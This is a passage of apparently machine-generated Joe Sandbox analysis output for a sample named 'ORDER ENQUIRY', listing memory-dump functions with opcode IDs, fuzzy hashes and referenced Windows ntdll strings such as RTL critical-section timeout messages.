                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 92d9b0c81aeb8280888ab7d409652f8948c75d4cde9cf1f4c6275d11658ac48e
                                                                                                                                                                          • Instruction ID: 78eedb609621eddc6d8bd675da3f2f1c955e7953674934a60348ff937699882e
                                                                                                                                                                          • Opcode Fuzzy Hash: 92d9b0c81aeb8280888ab7d409652f8948c75d4cde9cf1f4c6275d11658ac48e
                                                                                                                                                                          • Instruction Fuzzy Hash: 9390022260584482D10575585408A06040597D0245F55D051A10645DADC7358A91A231
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6b880c149d6a1ad6b752bc68d309ff2d5de499c9d65d728ac342f7752afa7742
                                                                                                                                                                          • Instruction ID: 7d93026be31d2861d627a812e2804fc54f9aa4c8db82d4a3307d4d429d870c0c
                                                                                                                                                                          • Opcode Fuzzy Hash: 6b880c149d6a1ad6b752bc68d309ff2d5de499c9d65d728ac342f7752afa7742
                                                                                                                                                                          • Instruction Fuzzy Hash: CE90023260180443D10571585508707040597D0241F55D451A042459DDD7568A916221
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 56b8cc1bede362571fc3d4b79d8c77ec43889ff5c68f65cfecad7713ffd71926
                                                                                                                                                                          • Instruction ID: 090fa2b0a5639f90bfd4b1f43fbfc1c633091e0660211191b9d64b38dfae0e55
                                                                                                                                                                          • Opcode Fuzzy Hash: 56b8cc1bede362571fc3d4b79d8c77ec43889ff5c68f65cfecad7713ffd71926
                                                                                                                                                                          • Instruction Fuzzy Hash: 08900222A0580442D14571585418706041597D0241F55D051A0024599DC7598B9567A1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a37f7e4c6d084b94c649bed0da3c3de3148cfa6959070f3c43cdfc18b8662b28
                                                                                                                                                                          • Instruction ID: 20be5e3b3166570e713eecb5a4981eef92eae745aa13dae647b8b9becddc8d36
                                                                                                                                                                          • Opcode Fuzzy Hash: a37f7e4c6d084b94c649bed0da3c3de3148cfa6959070f3c43cdfc18b8662b28
                                                                                                                                                                          • Instruction Fuzzy Hash: 5590023260180882D10571584404B46040597E0341F55C056A0124699DC715CA917621
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 72fb8a58c6047b7c74132ae7caa7289b32c4d3b1b87aba9a3780f2892b6f7ece
                                                                                                                                                                          • Instruction ID: 26059bc958de6bfdc2ce077244d39d6ff4592bc0cf9541c24c2e0db5b0d09e91
                                                                                                                                                                          • Opcode Fuzzy Hash: 72fb8a58c6047b7c74132ae7caa7289b32c4d3b1b87aba9a3780f2892b6f7ece
                                                                                                                                                                          • Instruction Fuzzy Hash: A2900232601C0442D10571584808747040597D0342F55C051A516459AEC765CAD16631
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8aa3615c7fd2bb64a69ab3fa57336baf0d972abb99d35b2a5005a36baa873813
                                                                                                                                                                          • Instruction ID: 3091b2df3532f631e640ff903c121f2cbd62d1d87f0cb57d4afcebbac3ab1dad
                                                                                                                                                                          • Opcode Fuzzy Hash: 8aa3615c7fd2bb64a69ab3fa57336baf0d972abb99d35b2a5005a36baa873813
                                                                                                                                                                          • Instruction Fuzzy Hash: 7690026261180082D10971584404706044597E1241F55C052A2154599CC6298EA15225
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1c2c8571896961ed634c8704205e6cad7ba91f83d07eaf06db9f0ba49104ce3c
                                                                                                                                                                          • Instruction ID: b2fdbcf6edff2816614b1c2ec5b9cfea2ef5c514686f7765c50a3708f16b110c
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c2c8571896961ed634c8704205e6cad7ba91f83d07eaf06db9f0ba49104ce3c
                                                                                                                                                                          • Instruction Fuzzy Hash: 40900262601C0443D14575584804607040597D0342F55C051A206459AECB298E916235
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b400f949e3b304fe1441fb17d2424bf7e247a72e1f6604f804b42b644789540e
                                                                                                                                                                          • Instruction ID: 677173c7911cb85eb0c48e3bc8f13e194e831d74a16dadf0353e09945efdf384
                                                                                                                                                                          • Opcode Fuzzy Hash: b400f949e3b304fe1441fb17d2424bf7e247a72e1f6604f804b42b644789540e
                                                                                                                                                                          • Instruction Fuzzy Hash: 1290022270180442D107715844146060409D7D1385F95C052E142459ADC7258B93A232
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 926a8404f26061c7d4193bfb2870f7a8a5c11a1f3d4db2fbb75afe99f5b06510
                                                                                                                                                                          • Instruction ID: 09b4c82992bea4b54482c0dbb153a67acb4b3d67ba5ef94e183d6670791400e1
                                                                                                                                                                          • Opcode Fuzzy Hash: 926a8404f26061c7d4193bfb2870f7a8a5c11a1f3d4db2fbb75afe99f5b06510
                                                                                                                                                                          • Instruction Fuzzy Hash: 1D90022264180842D145715884147070406D7D0641F55C051A0024599DC7168BA567B1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d804b278630f0c976af6f5a491cde110a171a51eee00b274feb0e14729aef094
                                                                                                                                                                          • Instruction ID: 9ffb4703245dddef05847e4aeca554ec6ea0227343ae9fe593b9756f9197effc
                                                                                                                                                                          • Opcode Fuzzy Hash: d804b278630f0c976af6f5a491cde110a171a51eee00b274feb0e14729aef094
                                                                                                                                                                          • Instruction Fuzzy Hash: 94900222601C4482D14572584804B0F450597E1242F95C059A4156599CCA158A955721
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 14aa96d6fe81f173833dd3f96c73bbad369f6539ac263bb21a4b5f5004c56873
                                                                                                                                                                          • Instruction ID: b04df8a08ad3cdf8b76ac190a7bf45585467035e4dd658d6c6a6510aebb4f1f9
                                                                                                                                                                          • Opcode Fuzzy Hash: 14aa96d6fe81f173833dd3f96c73bbad369f6539ac263bb21a4b5f5004c56873
                                                                                                                                                                          • Instruction Fuzzy Hash: 03900232A0590442D10571584514706140597D0241F65C451A04245ADDC7958B9166A2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 49a45d8f1cd9ed5c5ee5d5686c020d9c8fa8ee882b7e2f973cfb69bebb7779d4
                                                                                                                                                                          • Instruction ID: a9b9b8ee810fcd59b1b683d8fac2c926dc429860e876f0596450b941695c9dd9
                                                                                                                                                                          • Opcode Fuzzy Hash: 49a45d8f1cd9ed5c5ee5d5686c020d9c8fa8ee882b7e2f973cfb69bebb7779d4
                                                                                                                                                                          • Instruction Fuzzy Hash: DD90022264585142D155715C44046164405B7E0241F55C061A08145D9DC6558A956321
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4e91b7c9d3db6c6cd4ea613081d85603a88e6ee3c5b0c9ee4d1ca863a8a9a5a7
                                                                                                                                                                          • Instruction ID: 3a30424dd2b9fd0d00ac22aceab9f36e97986060f6a90be696b1b0cc66ff16ae
                                                                                                                                                                          • Opcode Fuzzy Hash: 4e91b7c9d3db6c6cd4ea613081d85603a88e6ee3c5b0c9ee4d1ca863a8a9a5a7
                                                                                                                                                                          • Instruction Fuzzy Hash: 7090023260280182954572585804A4E450597E1342B95D455A0015599CCA148AA15321
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 82efa76704457b1f03e0b4fe3069007869b501c5a9ee8c18085e4cd90347d58f
                                                                                                                                                                          • Instruction ID: cc25a8345ca1c29f00bf1246e3e8c3e8bab6d54e178dbc07f6032e3a2babe7f6
                                                                                                                                                                          • Opcode Fuzzy Hash: 82efa76704457b1f03e0b4fe3069007869b501c5a9ee8c18085e4cd90347d58f
                                                                                                                                                                          • Instruction Fuzzy Hash: C790023660180442D51571585804646044697D0341F55D451A042459DDC7548AE1A221
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                          • Instruction ID: d1c13ae296f594338205f387ca54148b2c9fe58baae30b2c71f14179e29606f6
                                                                                                                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                                                                          • Opcode ID: e07fc9a811566a6e58a2f69728ce2791a9dd5d4d103ee38c453f81e1b238d67b
                                                                                                                                                                          • Instruction ID: 831c91cb8b726f709f8a9bbbe02347a6cebabce3a4642ab2f43219ac7c85ee98
                                                                                                                                                                          • Opcode Fuzzy Hash: e07fc9a811566a6e58a2f69728ce2791a9dd5d4d103ee38c453f81e1b238d67b
                                                                                                                                                                          • Instruction Fuzzy Hash: 3C51B6B5A00156BFDB15DBEC8890A7FFBB8BB08240B54826EF569D7641D334DE4487E0
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                                                                          • Opcode ID: ba5834905847b45f841531f3b4c568d0e62d1ab6112b8a0dfb8a237a2e7d38dc
                                                                                                                                                                          • Instruction ID: b9d4ef648b656e219604a9d1ee896c5f8f8c665482c46c0587f6518a53dc7beb
                                                                                                                                                                          • Opcode Fuzzy Hash: ba5834905847b45f841531f3b4c568d0e62d1ab6112b8a0dfb8a237a2e7d38dc
                                                                                                                                                                          • Instruction Fuzzy Hash: 4D51F575A00646AEEF39DE5CC89097EBBFCEF54200B4484EAE5D6C7681E778DA408760
                                                                                                                                                                          Strings
                                                                                                                                                                          • ExecuteOptions, xrefs: 01B246A0
                                                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 01B24787
                                                                                                                                                                          • Execute=1, xrefs: 01B24713
                                                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01B24725
                                                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01B24742
                                                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01B246FC
                                                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01B24655
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                          • API String ID: 0-484625025
                                                                                                                                                                          • Opcode ID: c81777d40abaf58ae61cdd273aa50baf65e480a6b18a600f95af52ed8826fbdc
                                                                                                                                                                          • Instruction ID: 6fac249583febfa7464bcd1102710df9592e355e9c3f0221059b9db127670a21
                                                                                                                                                                          • Opcode Fuzzy Hash: c81777d40abaf58ae61cdd273aa50baf65e480a6b18a600f95af52ed8826fbdc
                                                                                                                                                                          • Instruction Fuzzy Hash: 95512B3160021ABAEF25ABE8DC99FBE77F8EF14314F0400D9E605AB191D7709A458F91
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                                                          • Instruction ID: 58adcf44bbb8df271d0aac8b8795565953e6a340f0454bf5623df691cefa6873
                                                                                                                                                                          • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                                                          • Instruction Fuzzy Hash: 5F022971508342AFD709DF18C590E6BBBE5EFC8B04F148A6DFA8987254DB31E905CB52
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __aulldvrm
                                                                                                                                                                          • String ID: +$-$0$0
                                                                                                                                                                          • API String ID: 1302938615-699404926
                                                                                                                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                          • Instruction ID: 5e535ebcff1d741b9cd3143b13896f31b7315d5bfd3a2424cff256eecbaaf511
                                                                                                                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                          • Instruction Fuzzy Hash: 39817F70E062499EEF258FECC8517EEBBB2AF85360F1C415DFA51A7291C73498408BB1
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                          • String ID: %%%u$[$]:%u
                                                                                                                                                                          • API String ID: 48624451-2819853543
                                                                                                                                                                          • Opcode ID: e082d4a0e3f9d4419f2759edc3a9150fcde8382b047d457a7acbdf7f5a8b28ee
                                                                                                                                                                          • Instruction ID: 9fc288ecf60332809f5209b09c6701d09980324c0ff99f52bfbba8d777a86018
                                                                                                                                                                          • Opcode Fuzzy Hash: e082d4a0e3f9d4419f2759edc3a9150fcde8382b047d457a7acbdf7f5a8b28ee
                                                                                                                                                                          • Instruction Fuzzy Hash: 2B213676E00119ABEB15DF69D841AFE7BFCEF64654F44019AEA05D3240E734DA018791
                                                                                                                                                                          Strings
                                                                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01B202BD
                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 01B2031E
                                                                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01B202E7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                          • API String ID: 0-2474120054
                                                                                                                                                                          • Opcode ID: ef1bf85b57f2f4e02b4d29c58aaaa0d225b32f351932718a1cd0c3c5de0a76a7
                                                                                                                                                                          • Instruction ID: 66832531882546d511c605f4379ba2bba6e76b9085007612cccaec6754d4ba57
                                                                                                                                                                          • Opcode Fuzzy Hash: ef1bf85b57f2f4e02b4d29c58aaaa0d225b32f351932718a1cd0c3c5de0a76a7
                                                                                                                                                                          • Instruction Fuzzy Hash: AFE19E30604B419FD729DF28C884B6BBBE0FB89314F140A5DF5A68B2E1D774D949CB42
                                                                                                                                                                          Strings
                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 01B27BAC
                                                                                                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01B27B7F
                                                                                                                                                                          • RTL: Resource at %p, xrefs: 01B27B8E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                          • API String ID: 0-871070163
                                                                                                                                                                          • Opcode ID: e113c7e07ab97d4011c3a607d19b29e7349a955a26d6f0ee23bccdfc35482aee
                                                                                                                                                                          • Instruction ID: f8e1e2c88924013f57c77dadda48f5fd1bdb6e432652198ff20c1bd1e6af53dc
                                                                                                                                                                          • Opcode Fuzzy Hash: e113c7e07ab97d4011c3a607d19b29e7349a955a26d6f0ee23bccdfc35482aee
                                                                                                                                                                          • Instruction Fuzzy Hash: CB4103317007029FDB29DF29CC58B6AB7E5EF98710F100A5DFA5AD7290DB31E8058BA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B2728C
                                                                                                                                                                          Strings
                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 01B272C1
                                                                                                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01B27294
                                                                                                                                                                          • RTL: Resource at %p, xrefs: 01B272A3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                          • API String ID: 885266447-605551621
                                                                                                                                                                          • Opcode ID: 6e320724c53cbb3c83d82a8fc6c9b6262194c901de357e5740c2af16ace6e6ae
                                                                                                                                                                          • Instruction ID: 4b517cc34b4d0c157b0a8e9118c9d441ae567172410567587aa1eb17dc0033bd
                                                                                                                                                                          • Opcode Fuzzy Hash: 6e320724c53cbb3c83d82a8fc6c9b6262194c901de357e5740c2af16ace6e6ae
                                                                                                                                                                          • Instruction Fuzzy Hash: 19412031700217ABCB29DE29CC45B66B7E1FBA6710F100658F959EB280DB30E85687E5
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                          • String ID: %%%u$]:%u
                                                                                                                                                                          • API String ID: 48624451-3050659472
                                                                                                                                                                          • Opcode ID: d3b25d66010c6bcd4ec38b171c34574ff6ab182561d2cb00abaa3b1204761af0
                                                                                                                                                                          • Instruction ID: f1e3c38cd9d662e13e5094cc781fbde499de33343363a02214a47ad82dca3ef2
                                                                                                                                                                          • Opcode Fuzzy Hash: d3b25d66010c6bcd4ec38b171c34574ff6ab182561d2cb00abaa3b1204761af0
                                                                                                                                                                          • Instruction Fuzzy Hash: 2F318872A002199FDB25DE2DCC80BEE77FCFF54650F4405DAE949E3140EB349A448B60
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __aulldvrm
                                                                                                                                                                          • String ID: +$-
                                                                                                                                                                          • API String ID: 1302938615-2137968064
                                                                                                                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                          • Instruction ID: a806f2c4079d80ec5596c5415f0498a2988c6b138e645b6a1d3168d6d73165de
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                          • Instruction Fuzzy Hash: A491A071E0021A9AEB24DFEDC880ABEBBB5AF44720F58461EFB55E72C0D7349941CB51
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: $$@
